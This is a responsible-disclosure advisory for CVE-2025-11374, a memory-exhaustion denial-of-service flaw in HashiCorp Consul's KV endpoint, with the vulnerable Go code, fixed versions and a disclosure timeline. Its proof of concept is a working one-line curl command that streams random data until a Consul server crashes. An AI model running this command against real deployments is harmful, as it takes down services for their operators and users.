HashiCorp Consul <= 1.21.5 KVS Denial of Service
Nov 2, 2025 · By Julien Ahrens
ADVISORY INFORMATION
Product: HashiCorp Consul
Vendor URL: https://developer.hashicorp.com/consul
CWE: Memory Allocation with Excessive Size Value [CWE-789]
Date found: 2025-09-19
Date published: 2025-11-02
CVSSv4 Score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
CVE: CVE-2025-11374
VERSIONS AFFECTED
Consul Community Edition <= 1.21.5
Consul Enterprise <= 1.21.5, 1.20.7, 1.19.9 and 1.18.11
INTRODUCTION
Consul is a service networking solution that enables teams to manage secure network connectivity between services, across on-prem, hybrid cloud, and multi-cloud environments and runtimes. Consul offers service discovery, service mesh, identity-based authorization, L7 traffic management, and secure service-to-service encryption.
(from the vendor’s homepage)
VULNERABILITY DETAILS
Consul’s key/value endpoint at “/v1/kv/test/key” is vulnerable to a denial of service condition. When a client sends a PUT request to the KV endpoint without a Content‑Length header, Consul’s request‑handling logic skips the size validation performed in agent/kvs_endpoint.go. The code path then streams the request body directly into an in‑memory buffer:
// Check the content-length
if req.ContentLength > int64(s.agent.config.KVMaxValueSize) {
return nil, HTTPError{
StatusCode: http.StatusRequestEntityTooLarge,
Reason: fmt.Sprintf("Request body(%d bytes) too large, max size: %d bytes. See %s.",
req.ContentLength, s.agent.config.KVMaxValueSize, "https://developer.hashicorp.com/docs/agent/config/config-files#kv_max_value_size"),
}
}
// Copy the value
buf := bytes.NewBuffer(nil)
if _, err := io.Copy(buf, req.Body); err != nil {
return nil, err
}
Because the size check is gated on the presence of Content‑Length, an attacker can craft a request with an arbitrarily large payload (or a streaming body) while omitting the header. Consul will allocate a buffer proportional to the incoming data, eventually exhausting the process’ memory and causing Consul to crash or become unresponsive.
Successful exploits can allow an authenticated attacker to crash the Consul service
PROOF OF CONCEPT
dd if=/dev/urandom | curl --http1.1 -X PUT -T - http://[address]:8500/v1/kv/test/key
SOLUTION
Update Consul Community to version 1.22.0
Update Consul Enterprise to 1.22.0, 1.21.6, 1.20.8 or 1.18.12
REPORT TIMELINE
- 2025-09-19: Discovery of the vulnerability
- 2025-09-19: Contacted the vendor via their security@ address
- 2025-09-22: Vendor sends initial response
- 2025-09-24: Vendor confirms the vulnerability
- 2025-10-06: RCE Security asks for the estimated patch date
- 2025-10-06: Vendor responds stating they want to ship fixes in the 1.22.0 release
- 2025-10-06: Vendor (CNA) assigns CVE-2025-11374
- 2025-10-15: Vendor sends another update stating the release is planned for 27th Oct
- 2025-10-27: Vendor publishes updates that fix the vulnerability
- 2025-11-02: Full Disclosure